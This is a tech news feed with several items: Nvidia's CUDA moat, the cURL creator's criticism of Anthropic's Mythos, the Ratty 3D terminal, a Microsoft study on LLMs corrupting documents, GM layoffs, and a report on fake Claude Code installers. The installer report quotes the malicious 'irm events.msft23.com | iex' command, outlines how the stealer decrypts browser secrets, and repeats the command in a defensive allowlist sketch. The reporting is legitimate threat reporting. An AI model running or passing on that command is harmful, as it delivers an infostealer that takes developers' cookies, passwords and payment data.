Nvidia's real AI moat isn't "a piece of hardware," writes Wired's Sheon Han. It's CUDA: a mature, deeply optimized software ecosystem that keeps machine-learning workloads tied to Nvidia GPUs. An anonymous reader quotes a report from Wired: What sounds like a chemical compound banned by the FDA may be the one true moat in AI. CUDA technically stands for Compute Unified Device Architecture, but much like laser or scuba, no one bothers to expand the acronym; we just say "KOO-duh." So what is this all-important treasure good for? If forced to give a one-word answer: parallelization. Here's a simple example. Let's say we task a machine with filling out a 9x9 multiplication table. Using a computer with a single core, all 81 operations are executed dutifully one by one. But a GPU with nine cores can assign tasks so that each core takes a different column -- one from 1x1 to 1x9, another from 2x1 to 2x9, and so on -- for a ninefold speed gain. Modern GPUs can be even cleverer. For example, if programmed to recognize commutativity -- 7x9 = 9x7 -- they can avoid duplicate work, reducing 81 operations to 45, nearly halving the workload. When a single training run costs a hundred million dollars, every optimization counts.
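Wired's multiplication-table example is easy to sketch. The following is an illustrative Python toy (no actual CUDA involved) showing the 81-task workload, the ninefold column split across nine "cores," and the commutativity trick that cuts the work to 45 operations:

```python
from itertools import product

# Naive approach: every cell of the 9x9 table is its own task -> 81 operations.
naive = [(a, b) for a, b in product(range(1, 10), repeat=2)]
assert len(naive) == 81

# Nine "cores", each taking one column (a fixed first factor): a ninefold split.
columns = {core: [(core, b) for b in range(1, 10)] for core in range(1, 10)}
assert all(len(col) == 9 for col in columns.values())

# Exploit commutativity (7x9 == 9x7): only compute pairs with a <= b.
deduped = [(a, b) for a, b in naive if a <= b]
assert len(deduped) == 45  # 81 -> 45, nearly halving the workload
```

Real CUDA kernels make the same move at vastly larger scale, mapping blocks of threads onto tiles of a matrix rather than columns of a times table.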
Nvidia's GPUs were originally built to render graphics for video games. In the early 2000s, a Stanford PhD student named Ian Buck, who first got into GPUs as a gamer, realized their architecture could be repurposed for general high-performance computing. He created a programming language called Brook, was hired by Nvidia, and, with John Nickolls, led the development of CUDA. If AI ushers in the age of a permanent white-collar underclass and autonomous weapons, just know that it would all be because someone somewhere playing Doom thought a demon's scrotum should jiggle at 60 frames per second. CUDA is not a programming language in itself but a "platform." I use that weasel word because, not unlike how The New York Times is a newspaper that's also a gaming company, CUDA has, over the years, become a nested bundle of software libraries for AI. Each function shaves nanoseconds off single mathematical operations -- added up, they make GPUs, in industry parlance, go brrr.
A modern graphics card is not just a circuit board crammed with chips and memory and fans. It's an elaborate confection of cache hierarchies and specialized units called "tensor cores" and "streaming multiprocessors." In that sense, what chip companies sell is like a professional kitchen, and more cores are akin to more grilling stations. But even a kitchen with 30 grilling stations won't run any faster without a capable head chef deftly assigning tasks -- as CUDA does for GPU cores. To extend the metaphor, hand-tuned CUDA libraries optimized for one matrix operation are the equivalent of kitchen tools designed for a single job and nothing more -- a cherry pitter, a shrimp deveiner -- which are indulgences for home cooks but not if you have 10,000 shrimp guts to yank out. Which brings us back to DeepSeek. Its engineers went below this already deep layer of abstraction to work directly in PTX, a kind of assembly language for Nvidia GPUs. Let's say the task is peeling garlic. An unoptimized GPU would go: "Peel the skin with your fingernails." CUDA can instruct: "Smash the clove with the flat of a knife." PTX lets you dictate every sub-instruction: "Lift the blade 2.35 inches above the cutting board, make it parallel to the clove's equator, and strike downward with your palm at a force of 36.2 newtons." "You can begin to see why CUDA is so valuable to Nvidia -- and so hard for anyone else to touch," writes Han. "Tuning GPU performance is a gnarly problem. You can't just conscript some tender-footed undergrad on Market Street, hand them a Claude Max plan, and expect them to hack GPU kernels. Writing at this level is a grindsome enterprise -- unless you're a cracker-jack programmer at DeepSeek..."
Han goes on to argue that rivals like AMD and Intel offer competitive specs on paper, but their software stacks have struggled with bugs, compatibility issues, and weak adoption. As a result, Nvidia has built an Apple-like moat around AI computing, leaving the industry dependent on its expensive hardware.
Read more of this story at Slashdot.
Categories: Linux fréttir
Anthropic's Bug-Hunting Mythos Was Greatest Marketing Stunt Ever, Says cURL Creator
cURL creator Daniel Stenberg says Anthropic's hyped Mythos bug-hunting model found only one confirmed low-severity vulnerability in cURL, plus a few non-security bugs, after he expected a much longer list. He argues Mythos may be useful, but not meaningfully beyond other modern AI code-analysis tools. "My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing," Stenberg said in a blog post. "I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos." He went on to call Mythos "an amazingly successful marketing stunt for sure." The Register reports: Stenberg explained in a Monday blog post that he was promised access to Anthropic's Mythos model - sort of - through the AI biz's Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl's codebase and later sent him a report. "It's not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway," Stenberg explained. "Getting the tool to generate a first proper scan and analysis would be great, whoever did it."
That scan, which analyzed curl's git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were "confirmed security vulnerabilities" in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report "felt like nothing," and that feeling was further validated by a review of Mythos' findings. "Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability," Stenberg said, bringing us back to the aforementioned number.
As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. "The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June," the cURL meister noted. "The flaw is not going to make anyone gasp for breath."
Read more of this story at Slashdot.
Categories: Linux fréttir
Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the emulator treats the terminal window itself as a 3D canvas: it supports sprites and 3D models, can render 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. 
“But everything comes with a cost, especially the spinning rat cursor.”
Building the fourth temple
Parmaksiz’s desire to push terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email. “I mean... 
I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now and Parmaksiz isn’t even sure it’s in his personal time budget to continue to maintain. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
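The emulation/presentation split Parmaksiz describes can be illustrated with Python's standard pty module: one side owns PTY I/O, and whatever consumes the captured bytes is free to present them however it likes. This is a minimal POSIX-only sketch of the idea, not Ratty's code; here the "presentation" layer is just a byte buffer, where Ratty instead rebuilds the state in Ratatui and renders it onto a Bevy texture:

```python
import os
import pty

def run_in_pty(argv):
    """Run a command attached to a pseudo-terminal and capture its output."""
    pid, fd = pty.fork()
    if pid == 0:  # child: becomes the command, with the PTY as its terminal
        os.execvp(argv[0], argv)
    chunks = []
    while True:
        try:
            data = os.read(fd, 1024)
        except OSError:  # EIO once the child side of the PTY closes
            break
        if not data:
            break
        chunks.append(data)
    os.close(fd)
    os.waitpid(pid, 0)
    return b"".join(chunks)

# The presentation layer sees only bytes; it could be a plain buffer, a
# curses screen, or - as in Ratty - a GPU-rendered 3D scene.
output = run_in_pty(["echo", "hello from the pty"])
assert b"hello from the pty" in output
```

Everything interesting in Ratty happens on the far side of this boundary, which is why the same PTY plumbing can feed a warped, sprite-laden 3D canvas as easily as a flat grid of glyphs.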
Categories: Linux fréttir
Microsoft researchers find AI models and agents can't handle long-running tasks
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. 
The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They found that only one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best-performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. 
Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
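The paper's core measurement, how much of a seed document survives repeated delegated edits, can be approximated in a few lines. This is a hypothetical sketch, not the authors' benchmark code: the lossy-edit model and retention metric are invented purely to show how small per-round losses compound well below a 98 percent "ready" bar over 20 interactions:

```python
# Hypothetical long-horizon degradation sketch (not the DELEGATE-52 code).

def retention(seed_lines, current_lines):
    """Fraction of the seed document's lines still present after editing."""
    current = set(current_lines)
    return sum(1 for line in seed_lines if line in current) / len(seed_lines)

seed = [f"entry {i}" for i in range(100)]

def lossy_edit(doc):
    # Simulate a model that silently drops a couple of lines per interaction.
    return [line for i, line in enumerate(doc) if i % 50 != 0]

doc = seed
for _ in range(20):  # 20 delegated round trips, as in the paper's setup
    doc = lossy_edit(doc)

# Tiny per-round losses compound far below a 98 percent readiness bar.
assert retention(seed, doc) < 0.98
```

This also illustrates why the authors argue two-interaction snapshots are misleading: after a couple of rounds the sketch's retention still looks near-perfect, and only the long horizon reveals the damage.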
Categories: Linux fréttir
Cookie thieves caught stealing dev secrets via fake Claude Code installers
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer while swapping in an attacker-controlled command. In this case, the legitimate command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced it with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers, exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attack also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. 
The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native ABE helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper names the pipe it uses to exfiltrate sensitive data after Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, falling back to the legacy IElevator interface on the Elevation Service if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. 
The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
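For developers, the simplest countermeasure against this lure is mechanical: check the host of any one-line installer before piping it to a shell. The sketch below is illustrative, not Ontinue's tooling; the allowlist content is an assumption, and the point is the policy of refusing commands whose URL host (or lack of one) doesn't match the expected vendor domain:

```python
# Illustrative defensive check for one-line installer commands.
from urllib.parse import urlparse

ALLOWED_HOSTS = {"claude.ai"}  # assumed allowlist of expected vendor domains

def installer_host_ok(command: str) -> bool:
    """Return True only if the command's first URL points at an allowed host."""
    for token in command.split():
        if token.startswith("https://") or token.startswith("http://"):
            return urlparse(token).hostname in ALLOWED_HOSTS
    return False  # no explicit URL found: refuse rather than guess

assert installer_host_ok("irm https://claude.ai/install.ps1 | iex")
assert not installer_host_ok("irm https://events.msft23.com | iex")
assert not installer_host_ok("irm events.msft23.com | iex")  # scheme-less lure
```

Note that this catches exactly the trick in this campaign - a lookalike page rendering a different host into the pasted command - but not a compromised legitimate host, which is why the researchers stress detection at the COM and PowerShell layers as well.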
Categories: Linux fréttir
GM Cutting Hundreds of Salaried IT Workers As It Trims Costs, Evaluates Needs
GM is laying off about 500 to 600 salaried IT workers, mainly in Austin, Texas, and Warren, Michigan, as it restructures its technology organization and trims costs. "GM is transforming its Information Technology organization to better position the company for the future. As part of that work, we have made the difficult decision to eliminate certain roles globally. We are grateful for the contributions of the employees affected and are committed to supporting them through this transition," the automaker said in an emailed statement. CNBC reports: GM reported employing about 68,000 salaried workers globally as of the end of last year, including 47,000 white-collar employees in the U.S. Despite Monday's cuts, GM is still hiring IT workers. The company has 82 open IT positions, including roles in artificial intelligence, motorsports, and autonomous vehicles, according to the automaker's careers website.
Read more of this story at Slashdot.
Categories: Linux fréttir
